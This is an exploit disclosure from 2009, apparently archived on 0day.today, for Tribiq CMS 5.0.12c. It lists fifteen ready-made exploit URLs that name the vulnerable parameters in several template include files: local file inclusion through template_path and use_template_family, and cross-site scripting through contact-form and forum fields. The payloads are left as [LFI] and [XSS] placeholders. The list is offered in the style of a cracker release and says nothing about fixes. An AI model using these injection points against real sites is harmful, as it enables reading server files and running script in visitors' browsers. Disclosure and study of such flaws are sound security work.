Tribiq CMS 5.0.12c (XSS/LFI) Multiple Remote Vulnerabilities

2009-06-24T00:00:00
ID 1337DAY-ID-5408
Type zdt
Reporter CraCkEr
Modified 2009-06-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Tribiq CMS 5.0.12c (XSS/LFI) Multiple Remote Vulnerabilities
============================================================


-----------------------------------------------------------------------------------¬
¦¦                                C r a C k E r                                   --
--             T H E   C R A C K   O F   E T E R N A L   M I G H T                ¦¦
L-----------------------------------------------------------------------------------

 -----         From The Ashes and Dust Rises An Unimaginable crack....         ----¬
-----------------------------------------------------------------------------------¬
--     [ Local File Include ]                                         [ XSS ]     --
L-----------------------------------------------------------------------------------
:   Author   : CraCkEr                   : :                                       :
¦   Script   : Tribiq CMS 5.0.12c        ¦ ¦          Register Globals :           ¦
¦   Download : sourceforge.net           ¦ ¦                                       ¦
¦   Method   : GET                       ¦ ¦           [ ] ON   [-] OFF            ¦
¦   Critical : High [--------]           ¦ ¦                                       ¦
¦   Impact   : system information        ¦ ¦                                       ¦
¦ ---------------------------------------- L-------------------------------------- ¦
¦                                                                                 --
L-----------------------------------------------------------------------------------
:                                                                                  :
¦  Release Notes:                                                                  ¦
¦  =============                                                                   ¦
¦  Typically used for remotely exploitable vulnerabilities that can lead to        ¦
¦  system compromise.                                                              ¦
¦                                                                                  ¦

-----------------------------------------------------------------------------------¬
--                                Exploit URL's                                   --
L-----------------------------------------------------------------------------------


[LFI]

http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/masthead.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/toppanel.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[LFI]


[XSS]

http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errordisplay=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errormessage=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[title]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threadlastpost]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[replies]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threads]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[description]=[XSS]
http://localhost/path/tb/common/tb_foot.inc.php?tbFootNonStandardFooter=[XSS]

   
L-----------------------------------------------------------------------------------
 

-----------------------------------------------------------------------------------¬
--                                 © CraCkEr 2009                                 --
L-----------------------------------------------------------------------------------



#  0day.today [2018-01-02]  #